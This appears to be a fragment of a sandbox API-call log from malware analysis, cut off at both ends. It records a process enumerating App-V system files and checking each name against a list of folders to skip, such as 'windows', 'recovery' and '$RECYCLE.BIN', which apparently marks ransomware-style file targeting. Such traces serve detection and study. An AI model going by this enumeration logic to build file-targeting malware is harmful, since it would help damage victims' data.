(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ApiClient.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0067.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ApiClient.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ApiClient.dll", lpUsedDefaultChar=0x0) returned 13 [0067.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0067.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ApiClient.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0067.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ApiClient.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ApiClient.dll", lpUsedDefaultChar=0x0) returned 13 [0067.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0067.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0067.549] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9bc01200, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0xa02d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVCatalog.dll", cAlternateFileName="APPVCA~1.DLL")) returned 1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2=".") returned 1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2="..") returned 1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2="...") returned 1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2="windows") returned -1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2="recovery") returned -1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2="perflogs") returned -1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2="documents and settings") returned -1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2="system volume information") returned -1 [0067.549] lstrcmpiW (lpString1="AppVCatalog.dll", lpString2="msocache") returned -1 [0067.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVCatalog.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVCatalog.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVCatalog.dll", lpUsedDefaultChar=0x0) returned 15 [0067.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVCatalog.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVCatalog.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVCatalog.dll", lpUsedDefaultChar=0x0) returned 15 [0067.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0067.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.550] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x1f5ad8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="appvcleaner.exe", cAlternateFileName="APPVCL~1.EXE")) returned 1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2=".") returned 1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2="..") returned 1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2="...") returned 1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2="windows") returned -1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2="recovery") returned -1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2="perflogs") returned -1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2="documents and settings") returned -1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2="$RECYCLE.BIN") returned 1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2="system volume information") returned -1 [0067.550] lstrcmpiW (lpString1="appvcleaner.exe", lpString2="msocache") returned -1 [0067.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="appvcleaner.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="appvcleaner.exe", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appvcleaner.exe", lpUsedDefaultChar=0x0) returned 15 [0067.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="appvcleaner.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="appvcleaner.exe", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appvcleaner.exe", lpUsedDefaultChar=0x0) returned 15 [0067.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0067.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0067.550] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a330a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a330a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x4b0d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVFileSystemMetadata.dll", cAlternateFileName="APPVFI~1.DLL")) returned 1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2=".") returned 1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="..") returned 1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="...") returned 1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="windows") returned -1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="recovery") returned -1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="perflogs") returned -1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="documents and settings") returned -1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="system volume information") returned -1 [0067.551] lstrcmpiW (lpString1="AppVFileSystemMetadata.dll", lpString2="msocache") returned -1 [0067.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVFileSystemMetadata.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0067.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVFileSystemMetadata.dll", cchWideChar=26, lpMultiByteStr=0x241010, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVFileSystemMetadata.dll", lpUsedDefaultChar=0x0) returned 26 [0067.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVFileSystemMetadata.dll", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0067.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVFileSystemMetadata.dll", cchWideChar=26, lpMultiByteStr=0x2413a8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVFileSystemMetadata.dll", lpUsedDefaultChar=0x0) returned 26 [0067.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0067.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0067.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.551] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a330a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a330a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x2052d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVIntegration.dll", cAlternateFileName="APPVIN~1.DLL")) returned 1 [0067.551] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2=".") returned 1 [0067.551] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2="..") returned 1 [0067.551] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2="...") returned 1 [0067.551] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2="windows") returned -1 [0067.551] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2="recovery") returned -1 [0067.551] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2="perflogs") returned -1 [0067.551] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2="documents and settings") returned -1 [0067.551] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.552] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2="system volume information") returned -1 [0067.552] lstrcmpiW (lpString1="AppVIntegration.dll", lpString2="msocache") returned -1 [0067.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIntegration.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0067.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIntegration.dll", cchWideChar=19, lpMultiByteStr=0x240f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIntegration.dll", lpUsedDefaultChar=0x0) returned 19 [0067.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIntegration.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIntegration.dll", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIntegration.dll", lpUsedDefaultChar=0x0) returned 19 [0067.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0067.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0067.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0067.552] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a59305, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a59305, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x726d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVIsvApi.dll", cAlternateFileName="APPVIS~1.DLL")) returned 1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2=".") returned 1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2="..") returned 1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2="...") returned 1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2="windows") returned -1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2="recovery") returned -1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2="perflogs") returned -1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2="documents and settings") returned -1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2="system volume information") returned -1 [0067.552] lstrcmpiW (lpString1="AppVIsvApi.dll", lpString2="msocache") returned -1 [0067.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0067.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvApi.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvApi.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvApi.dll", lpUsedDefaultChar=0x0) returned 14 [0067.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0067.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0067.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvApi.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvApi.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvApi.dll", lpUsedDefaultChar=0x0) returned 14 [0067.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0067.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0067.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0067.553] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe1b7300, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x60ea0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppvIsvStream32.dll", cAlternateFileName="APPVIS~2.DLL")) returned 1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2=".") returned 1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="..") returned 1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="...") returned 1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="windows") returned -1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="recovery") returned -1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="perflogs") returned -1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="documents and settings") returned -1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="system volume information") returned -1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream32.dll", lpString2="msocache") returned -1 [0067.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream32.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0067.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream32.dll", cchWideChar=19, lpMultiByteStr=0x240fe8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvStream32.dll", lpUsedDefaultChar=0x0) returned 19 [0067.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream32.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream32.dll", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvStream32.dll", lpUsedDefaultChar=0x0) returned 19 [0067.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0067.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0067.553] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb5e67000, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x73aa0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppvIsvStream64.dll", cAlternateFileName="APPVIS~3.DLL")) returned 1 [0067.553] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2=".") returned 1 [0067.554] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="..") returned 1 [0067.554] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="...") returned 1 [0067.554] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="windows") returned -1 [0067.554] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="recovery") returned -1 [0067.554] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="perflogs") returned -1 [0067.554] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="documents and settings") returned -1 [0067.554] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.554] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="system volume information") returned -1 [0067.554] lstrcmpiW (lpString1="AppvIsvStream64.dll", lpString2="msocache") returned -1 [0067.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream64.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0067.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream64.dll", cchWideChar=19, lpMultiByteStr=0x240f70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvStream64.dll", lpUsedDefaultChar=0x0) returned 19 [0067.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream64.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0067.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvStream64.dll", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvStream64.dll", lpUsedDefaultChar=0x0) returned 19 [0067.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0067.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0067.554] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, 